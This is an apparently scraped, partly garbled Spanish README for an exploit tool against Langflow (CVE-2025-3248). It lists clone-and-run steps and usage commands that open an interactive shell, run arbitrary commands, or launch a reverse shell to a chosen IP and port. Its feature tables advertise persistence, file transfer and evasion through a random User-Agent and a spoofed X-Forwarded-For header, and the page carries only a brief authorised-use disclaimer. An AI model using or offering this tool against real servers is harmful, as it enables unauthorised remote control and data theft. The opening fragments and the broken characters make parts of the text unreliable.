
Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248) - [ Por S4Tech ]
Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248)
persist)upload local_path remote_pathdownload remote_path local_pathclear para terminalUser-Agent aleatorioX-Forwarded-For falsificadasexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ Esta herramienta es solo para fines educativos y de pruebas autorizadas.
âڑ ï¸ڈ El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.
Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.
Las solicitudes de extracción son bienvenidas. Para cambios importantes, abra primero un issue para discutir lo que le gustaría cambiar.
| Característica | v1.0 | v2.0 |
|---|
| Métodos de payload | 1 | 5 |
| Transferencia de archivos | ❌ No soportada | ✅ Soportada |
| Persistencia | ❌ | ✅ |
| Nivel de sigilo | Básico | Avanzado |
| Registro de sesión | ❌ | ✅ |
| Opción | Descripción |
|---|
--shell | Inicia una shell interactiva |
--reverse IP PORT | Lanza una reverse shell a la IP:PUERTO especificada |
--command CMD | Ejecuta un solo comando |
--verbose | Habilita salida detallada |
--timeout SEC | Establece tiempo de espera de solicitud (predeterminado: 10s) |